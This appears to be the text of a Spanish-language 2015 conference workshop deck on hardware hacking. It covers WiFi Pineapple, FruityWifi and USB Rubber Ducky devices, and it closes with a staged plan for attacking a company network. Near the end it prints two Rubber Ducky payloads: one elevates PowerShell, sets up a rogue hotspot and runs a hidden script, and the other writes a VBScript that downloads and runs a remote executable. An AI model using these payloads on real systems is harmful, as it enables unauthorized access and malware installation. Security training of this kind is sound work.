Embed Size (px)
Citation preview
Jaime Álvarez y Roberto García
Hardware Hacking
Except where otherwise noted, this work is licensed under:
http://creativecommons.org/licenses/by-nc-sa/3.0/
2
3
¿Quiene$ $omo$?
Jaime Álvarez:• Es un apasionado del mundo de la Informática, siempre ha estado muy
relacionado con la Seguridad Informática y la Calidad del Software. • Ha trabajado durante muchos años en el departamento de Calidad del
Software y Administración de Sistemas en empresas estatales y privadas .• Es componente de Bugtraq- Team, un proyecto que está dedicándose a la
implantación de un Sistema Operativo orientado a la Seguridad Informática.
• Ha impartido talleres sobre hardware hacking en diversas conferencias.
Roberto García: • Es consultor de seguridad en InnotecSystem. Cuenta con más de 10 años
de experiencia como Administrador de sistemas Windows, trabajando para empresas multinacionales líderes del sector. Es MCSA de Microsoft 2012 Server.
• Es autor del blog 1gbdeinformacion, ganador del premio “Héroe Digital” de ESET en 2013 y finalista en 2014.
Hardware Hacking –Piñas, Alfas y demás…Leganés
12-13 Febrero
2015
4
Hardware Hacking
¿¡ Por que este taller !?“Estamos acostumbrados a
usar los medios (...) como
algo comunitario sin tener
en cuenta los peligros
existentes... no solo
descuidando nuestra
privacidad y seguridad, si
no también nuestras
obligaciones respecto a
estas...”
Hardware Hacking
¿Que es el Hardware Hacking?
● Herramientas que se basan en hardware para facilitar el trabajo en un “escenario” tanto ofensivo como defensivo.
● Las herramientas se sustentan por un firmware y/o un software interno o externo.
● Suelen ser herramientas multidisciplinares.
● Hardware y software pre-configurado y de fácil uso.
● Interfaces muy intuitivas.
● Normalmente portables y/o autónomas.
Throwing Star LAN Tap
● Hardware Hacking puro (no requiere de software)
● Pasivo (No alimentado)
● Monitoriza BASE10-T, 100BASE-T y RS-232 DB9 (puerto serie)
● Puede monitorizar 1000BASE-T (renegociando la velocidad)
● Dos condensadores pF 220 para hacer el bypass del par extra que requiere el 1000BASE-T
● Los puertos J3 y J4 son solo receptores
● Dos jacks RJ45 para la red monitorizada (I/O)
● Dos jacks RJ45 independientes para la monitorización ( J1-J3 / J2-J4)
WIRELESS HARDWARE HACKING
Firmware utilizado:
● OpenWRT o DD-WRT (uso comercial)
● Modificaciones de OpenWRT
¿Por que OpenWRT?
● Costes / Licencia GPLv2
● Ultralijero y compacto.
● Firmware adaptable (+3500 paquetes de
software)
● Diseñado para sistemas embebidos
Beini WIFIROBIN 2Especificaciones Técnicas:
● Chipset Atheros AR9331 400Mhz
● 1x IEEE 802.11b/g/n
● 2x Ethernet 100BASE-T
● 1x USB (multi-disciplinar)
● Software OpenWRT (Beini)
● Alimentación Externa 5V/2A
● Antena alta ganancia (5dB) PR-SMA
● Soporta WEP, WPA y WPA2
● Función de Router, Punto de Acceso, modo repetidor.
● Cracking WEP y WPA
Beini WIFIROBIN 2Características técnicas:
● Router
● Punto de Acceso (AP)
● Repetidor
● Recuperación claves WEP y WAP
La recuperación de claves WEP se hace
mediante la suite aircrack con inyección
de paquetes. Sin embargo de las
claves WAP se hace necesario un
diccionario que podemos ampliar por
USB ya que se realiza mediante ataque
de Fuerza Bruta.
PINEAPPLE MARK IV
Especificaciones:● OpenWRT modificado
● Chip: 400 MHz MIPS AtherosAR9331 (IEEE) 802.11 b/g/n)
8Mb RAM / 32Mb ROM
● 1x USB
● 2x 100BASE-T Ethernet (LAN / WAN)
● 1X botón “WPS” configurable a 5 acciones distintas (según pulsaciones)
● Ya no tiene soporte oficial
ALFA AP121U == MARK IV
=
==
ALFA NETWORK AP121U / HORNET-UB
● La tarjeta ALFA AP121U se
basa en la placa HORNET-UB
(existen 2 modelos)
● Modelo con Memoria Flash
8M/32M
● U-BOOT (bootloader)
● Soporta OpenWRT● Modulo conversor USB
2.0 a TTL UART 6PIN
CP2102
● Flash Firmware a
Pineapple Mark IV
PINEAPPLE MARK IVWiFi Pineapple Mark IV es un dispositivo que permite
realizar ataques man-in-the-middle, Karma, DNS Spoofing, SSLstrip, desautentification, tcpdump, incluso ataques de Phishing. La versatilidad se encuentra en la posibilidad de adaptar nuestro dispositivo mediante infusiones.
Las Infusiones son “añadidos” que podremos
programar nosotros mismos o descargados del
Pineapple Bar. La infusiones mas conocida de este
dispositivo son KARMA y SSLstrip.
MARK IV GUI
PINEAPPLE MARK IVKARMA es un set de herramientas para la evaluación de
clientes inalámbricos en distintas capas. Las herramientas de descubrimiento a través de Wireless sniffing, captan los clientes cercanos y sus redes preferidas mediante la escucha pasiva de paquetes Probe Request.
POC MARK IV / KARMA
RASPBERRY PI (FruityWifi)
FRUITYWIFI
● Desarrollador: xtr4nge
● RaspDebian con Pwnpi
● https://github.com/xtr4nge/FruityWifi/
RASPBERRY B / B+
● ARM 700 MHz (ARM11)
● 512 MiB (compartidos con la
GPU)
● HDMI
● RCA / HDMI / DSI
● 3,5mm Audio Jack
● 8 x GPIO, SPI, I²C, UART
● 5v microUSB
● 2 / 4 USB 2.0
FruityWifi
FruityWifi : es una herramienta de código abierto para auditoria de redeswireless. Permite desplegar rápida y fácilmente ataques avanzadosutilizando la interfaz web o enviándole mensajes. Inicialmente la aplicacionfue creada para utilizarse con una Raspberry-Pi, pero puede ser instaladaen cualquier sistema basado en Debian.
FruityWifi : se compone de módulos para darle más flexibilidad. Algunos de los modulos disponibles son URLsnarf, DNSspoof, Kismet, mdk3, ngrep, nmap, Squid3 y SSLstrip (con funcionalidades para inyectar código), Captive Portal, AutoSSH, Meterpreter, Tcpdump, etc...
NOVEDAD : FruityWifi v2.0 trae muchas novedades. Una nuevainterfaz, nuevos módulos, soporte para chipsets Realtek, soportepara Mobile Broadband (3G/4G), un nuevo panel de configuración, y más.
FruityWifi 2.0 Gui / Modulos
FruityWifi - WHATSapp
POC MARK IV / sslstrip
POC MARK IV / Phishing
24
PINEAPPLE MARK V
En Noviembre de 2013 se sacó un nuevohardware más avanzado con dos antenas de redcomo se ha visto.
La GUI del sistema se ha renovadocompletamente y está en continua evolucióndebido a que es el sistema mas actual y estábajo soporte.
Debido al puerto de expansión se espera queeste modelo sea mas duradero y ya han salidonuevos gadgets, como puede ser una caja paracontener dos Mark V conectadas en red, unaplaca de expansión para controladores externoso cajas de ocultación parecidas a “la alarma demi casa”.
PINEAPPLE MARK V
● 1x IEEE 802.11b/g/n Radio, AR9331
● 1x IEEE 802.11a/b/g Radio, RTL8187
● Procesador MIPS a400Mhz
● Memoria 64MB DDR2
● Memoria flash 16MB
● 1x USB 2.0
● 1x 100BASE-T Ethernet.
● Ranura Micro-SD
● Modos de arranque mediante Switches
● Indicadores LED
● Puerto de Expansión
● Serial TTL
● OpenWRT modificado y FailSave
PINEAPPLE MARK V
GUI - MARK V
MARK V / poc - PINEAPP
MARK V / poc - ccupineapple
MARK V / poc - Evilportal
MARK V / POC - ADS-B tracker
USB RUBBER DUCKY
Especificaciones:
● 60Mhz 32-bit CPU
● Botón de repetición
● Indicador LED
● 1X USB Tipo A 2.0
● Puerto Micro-SD
(128Mb)
● Carcasa de ocultación
USB RUBBER DUCKY
Características técnicas:
● Soporta Multi HID (12 idiomas)
● Firmware amoldable
● Encoder Multiplataforma
● Soportado para Windows / Unix / OSX / Android / IOS
● Encoder con soporte de múltiples comandos (Alt+Contol+Supr)
● VID & PID manipulables
USB RUBBER DUCKY
DESGLOSE DE COMANDOS del Encoder:
● DELAY x- Espera x milisegundos
● STRING xxx – Escribe xxx
● GUI – Tecla Windows
● GUI R – Windows + R (ejecutar)
● Command – Tecla de comando OSX
● ENTER – Intro
● SPACE – Espacio
● REPEAT x – Repite comando anterior x veces
● CAPS |CAPSLOCK – Bloqueo Mayúsculas
● UP | UPARROW – Tecla arriba
● DOWN | DOWNARROW –Tecla abajo
● LEFT | LEFTARROW – Tecla izquierda
● RIGHT | RIGHTARROW – Tecla derecha
● SHIFT – Shift
● DEL – Borrar
● CONTROL – Control
USB RUBBER DUCKY
OTRO FIRMWARE DISPONIBLE:
● duck.hex (Duck(Original))
● usb.hex (FAT Duck)
● m_duck.hex (Detour Duck (formerlyNaked Duck))
● c_duck.hex (Twin Duck)
● cm_duck.hex alpha(unamed)
PoC Rubber DUCKY: UBUNTU 14.04
Seguridad PERIMETRAL
Seguridad PERIMETRAL
Seguridad PERIMETRAL
No se establece una
política de actualizaciones.
No se establece una
política de configuraciones
en el router.
No se realiza “hardering”
sobre la red local,
servidores, ni equipos de
trabajo.
Ni que pensar del “Bring
your own device”
ES HORA DE VOLVERSE EL
MALO;-P
POC SEGUIMIENTO PINEAP
POC Seguimiento INFORMACIÓN
POC ANALIZANDO REDES
POC ATAQUE 1 (EL PLATO)
POC ATAQUE 1 (RECETA)
Material necesario:
1 Drone
1 Piña o más... (añadir mas piñas para ocultar “el sabor”)
1 PC
Antenas lo suficientemente potentes.
POC ATAQUE 2 (Preparando la piña)
INFUSIONES y MeDIOS:
Infusión WPS
Modo cliente
PC
Objetivo: Posicionar y controlar nuestra piña lo mas cerca del
router de la empresa.
Aprovechar una mala configuración para conectarnos como usuarios legítimos en la red.
POC ATAQUE 1 (COCINANDO)
Piña1 Wlan0 ataca wps
Piña2 Wlan1 conecta modo cliente con Piña1 Wlan0-1 para control (red protegida WPA2 SSL)
Piña2 Wlan0-1 o Piña2 Ethernet quedan libres para control de Piña2 desde nuestro PC y de ahí tendremos acceso a Piña1 Wlan0-1
Una vez finalizado el ataque WPS de Piña1 conectamos Piña1 Wlan1 en modo cliente con WlanVictima dandonosacceso a Piña1 desde Piña1 Wlan0-1 a traves de Piña2 Wlan1 y Piña2 Wlan0-1 a su vez desde el PC.
POC Ataque 1 (RESULTADO)
POC ATAQUE 2 (PLAN B)
POC PLAN B PATO 1DELAY 750
GUI m
GUI r
DELAY 500
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 500
ALT s
DELAY 500
ENTER
STRING netsh wlan set hostednetwork
ssid=SSIDFALSO key=Clave+Falsa
ENTER
STRING netsh wlan start hostednetwork
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL G
DELAY 500
STRING C:\Windows\config-25381.ps1
ENTER
DELAY 500
ALT F4
DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT s
DELAY 500
STRING mode con:cols=14 lines=1
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 500
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
GUI l
ENTER
POC PLAN B PATO 2ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write
objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO =
Createobject("Scripting.FileSystemObject"):If
objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set
objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <METEMOS LA URL AQUI>
ENTER
STRING <METEMOS EL ARCHIVO .EXE AQUI>
ENTER
STRING exit
ENTER
POC ATAQUE 3 (PLAN C)Usando el ambientador...
POC ATAQUE 3 (PLAN C)Ocultando el Olor
Foto de David de Roman
OTRO HARDWARE
Teensy v3.1 HackRF One
Para aladdin gurbanov
Persona, hacker y compañero.
MUCHAS GRACIAS!
Jaime Álvarez de Aldecoa
Twitter: @KioArdetroya
E-mail: [email protected]
Roberto García Amoriz
Twitter: @1GbDeInfo
E-mail: [email protected]
Blog: www.1gbdeinformacion.com
